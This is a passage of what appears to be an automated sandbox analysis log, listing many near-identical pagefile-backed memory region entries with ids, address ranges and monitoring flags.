0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7682 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7683 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7684 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7685 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7686 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7687 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7688 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7689 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7690 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7691 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7692 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7693 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7694 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7695 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7696 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7697 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7698 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7699 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7700 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7701 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7702 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 7703 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7704 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7705 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7706 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7707 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7708 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7709 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7710 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7711 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7712 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7713 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7714 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7715 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7716 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7717 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7718 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7719 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7720 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7721 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7722 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7723 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7724 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 7725 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7726 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7727 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7728 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7729 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7730 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7731 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7732 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7733 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7734 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7735 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7736 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7737 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7738 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7739 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7740 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7741 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7742 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7743 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7744 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7745 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7746 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 7747 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7748 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7749 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7750 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7751 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7752 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7753 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7754 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7755 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7756 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7757 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7758 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7759 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7760 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7761 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7762 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7763 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7764 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7765 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7766 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7767 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7768 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 7769 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7770 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7771 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7772 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7773 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7774 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7775 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7776 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7777 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7778 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7779 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7780 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7781 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7782 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7783 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7784 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7785 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7786 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7787 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7788 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7789 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7790 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 7791 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7792 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7793 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7794 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7795 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7796 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7797 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7798 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7799 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7800 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7801 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7802 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7803 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7804 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7805 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7806 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7807 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7808 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7809 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7810 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7811 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7812 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 7813 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7814 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7815 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7816 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7817 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7818 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7819 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7820 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7821 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7822 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7823 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7824 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7825 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7826 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7827 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7828 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7829 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7830 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7831 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7832 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7833 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7834 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 7835 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7836 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7837 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7838 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7839 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7840 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7841 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7842 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7843 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7844 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7845 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7846 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7847 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7848 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7849 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7850 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7851 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7852 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7853 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7854 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7855 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7856 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 7857 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7858 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7859 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = 